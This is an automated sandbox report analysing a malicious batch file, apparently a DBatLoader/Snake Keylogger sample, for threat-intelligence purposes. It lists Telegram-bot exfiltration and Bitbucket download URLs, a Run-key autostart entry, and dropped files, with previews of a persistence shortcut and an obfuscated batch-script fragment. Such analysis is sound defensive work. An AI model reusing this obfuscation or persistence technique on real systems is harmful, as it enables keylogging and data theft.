                                                                      https://api.telegram.org/bothxzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://api.telegram.orgxzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://api.telegram.orghxzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                              		high
                                                                              https://bbuseruploads.s3.amazonaws.com/spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://ocsp.sectigo.com0Cspoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-cspoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.pmail.com0spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    132.226.8.169
                                                                                    		checkip.dyndns.comUnited States
                                                                                    		16989UTMEMUSfalse
                                                                                    149.154.167.220
                                                                                    		api.telegram.orgUnited Kingdom
                                                                                    		62041TELEGRAMRUfalse
                                                                                    185.166.143.48
                                                                                    		bitbucket.orgGermany
                                                                                    		16509AMAZON-02USfalse
                                                                                    54.231.224.185
                                                                                    		s3-w.us-east-1.amazonaws.comUnited States
                                                                                    		16509AMAZON-02USfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1577663
                                                                                    Start date and time:2024-12-18 16:29:24 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 52s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:30
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:F.O Pump Istek,Docx.bat
                                                                                    Detection:MAL
                                                                                    Classification:mal100.bank.troj.spyw.evad.winBAT@42/18@5/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 59
                                                                                    • Number of non-executed functions: 209
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .bat

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: F.O Pump Istek,Docx.bat

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    10:30:28API Interceptor2x Sleep call for process: spoolsv.COM modified
                                                                                    10:30:47API Interceptor4x Sleep call for process: Cneehezx.PIF modified
                                                                                    10:30:49API Interceptor641470x Sleep call for process: xzeheenC.pif modified
                                                                                    16:30:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url
                                                                                    16:30:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    132.226.8.1690001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    bitbucket.orgD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 185.166.143.49
                                                                                    credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                    • 185.166.143.48
                                                                                    fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.48
                                                                                    V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.48
                                                                                    GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.50
                                                                                    4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.49
                                                                                    fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                    • 185.166.143.50
                                                                                    hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.166.143.49
                                                                                    s3-w.us-east-1.amazonaws.comD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 52.217.32.148
                                                                                    https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                    • 3.5.25.98
                                                                                    http://www.kukaj-to.chat/sedoGet hashmaliciousUnknownBrowse
                                                                                    • 3.5.27.174
                                                                                    fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                    • 3.5.31.118
                                                                                    V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                    • 3.5.28.132
                                                                                    BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                    • 3.5.0.126
                                                                                    GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                    • 16.182.39.201
                                                                                    https://eu.onamoc.comano.us/XaFJNdmNsY0JUVzZrd09aZnpEZk9LNXJHSFV1RTlrbFdPMXQ5dzRKTHV4dEdpUEhTM1I1MCszdjdWWm54V01kSEhOSlpOSFpjMUlsaFNTc0l3eXhVeWl3TGVjWm14bGMxUFkzWWFkVUQvbUlNMGEza0pnOFFCK3N4TDBlc3RyYWJkSE9xVU9ETG5TU1lHQkZwdStVdXhGMzdoQzltdFAwRnc0WTJuMmF3Q1VkTzdMb0lwNXhqOFQ3eGRtK0ZuQUpydjMxSWdnPT0tLUFPWFdqaFhtRnVKaEhNK20tLUlJNFZwQjNETFQyTk1iL0UxMUxBTGc9PQ==?cid=300477933Get hashmaliciousKnowBe4Browse
                                                                                    • 52.216.54.49
                                                                                    https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                    • 52.216.58.145
                                                                                    18037.docGet hashmaliciousUnknownBrowse
                                                                                    • 52.216.144.19
                                                                                    api.telegram.orgD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                    • 149.154.167.220
                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    checkip.dyndns.comD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 193.122.130.0

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                    • 149.154.167.99
                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    UTMEMUSD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 132.240.253.211
                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 132.244.23.61
                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.8.169
                                                                                    AMAZON-02USD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 185.166.143.49
                                                                                    armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                    • 34.243.160.129
                                                                                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 34.254.182.186
                                                                                    https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 76.76.21.21
                                                                                    https://heyzine.com/flip-book/f976862c0c.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 35.157.30.249
                                                                                    https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                    • 108.158.75.74
                                                                                    http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                                                                    • 99.79.158.237
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 3.130.71.34
                                                                                    VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                    • 3.5.237.31
                                                                                    loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 184.79.152.88

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 149.154.167.220
                                                                                    https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                    • 149.154.167.220
                                                                                    kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    cali.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    a0e9f5d64349fb13191bc781f81f42e1D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    iOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48
                                                                                    random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                    • 54.231.224.185
                                                                                    • 185.166.143.48

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\Public\Libraries\xzeheenC.pifD.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                      qDKTsL1y44.exeGet hashmaliciousDBatLoaderBrowse
                                                                                        PRODUCT.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                          purchaseorder.batGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            PO11550.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                              SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeGet hashmaliciousAgentTesla, DBatLoader, RedLineBrowse
                                                                                                PCMNil7wkU.exeGet hashmaliciousAgentTesla, AsyncRAT, DBatLoader, RedLineBrowse
                                                                                                  tTIYCp2sf4.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                    Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\Public\Cneehezx.url

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF">), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):104
                                                                                                      Entropy (8bit):5.029068180804542
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1d1sbxSFARuAc:HRYFVmTWDyzwExSqRPc
                                                                                                      MD5:EED10F07FE1DBF0FF3AE5CC472F14792
                                                                                                      SHA1:326360EC682E857C41E909F6264D921BC1003F63
                                                                                                      SHA-256:C6AE718065B7199467422A84478FDBCFCA843EE6F12B210E45B6BC2731B430BE
                                                                                                      SHA-512:6ED3F93D62E9378B0ED8119F8C9460DD93048275B0926F13D263229104D371C1471D826B8AE230F8842B3695E7FA720D5344DAB4B4218FDD3F9BFF3652AFE6AB
                                                                                                      Malicious:true
                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF"..IconIndex=930636..HotKey=93..

                                                                                                      C:\Users\Public\CneehezxF.cmd

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15789
                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                      Malicious:false
                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

                                                                                                      C:\Users\Public\Libraries\Cneehezx

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):583193
                                                                                                      Entropy (8bit):7.3073922634117
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:iF0qv+93X92OirXQ2mHlHCrVs1NY/Ac95S5XCswppBYdH:i+qG9IOiM2iU/50CtQ
                                                                                                      MD5:4F30E1377F4BDE432BFCDF9E0545EEC6
                                                                                                      SHA1:048E58EBD70C38E15AD1BEE80C3B50FB149EAC02
                                                                                                      SHA-256:7FFEBB424079AA78D67B79ABCE9CDF79F3E0590F2452823400FFE2BB45BAA23A
                                                                                                      SHA-512:07074EAA924050F6D34102D16DBECAA6B4E279FD452BA0732CABDD308CAF732C7757D0E2245ABE2A8DDFA81E3F261B05BA4F7C6FD27E47E2D84CC3904C0BE97E
                                                                                                      Malicious:true
                                                                                                      Preview:...:...,................................................................................................:...,/.............:...,..............................................................................................................................................................................................................................................................................................~..........................................~...............................................................#~... ..+...... .....".....................!.............................*........................}................~........}&.................'#...&...&... ................... "...)......!.'............ ...&....*....... ......#...............................*....*..................~.........................*.#........................}..... ).....!..)%...................$...~.........%}.. ...

                                                                                                      C:\Users\Public\Libraries\Cneehezx.PIF

                                                                                                      Download File
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1019392
                                                                                                      Entropy (8bit):7.009304310152198
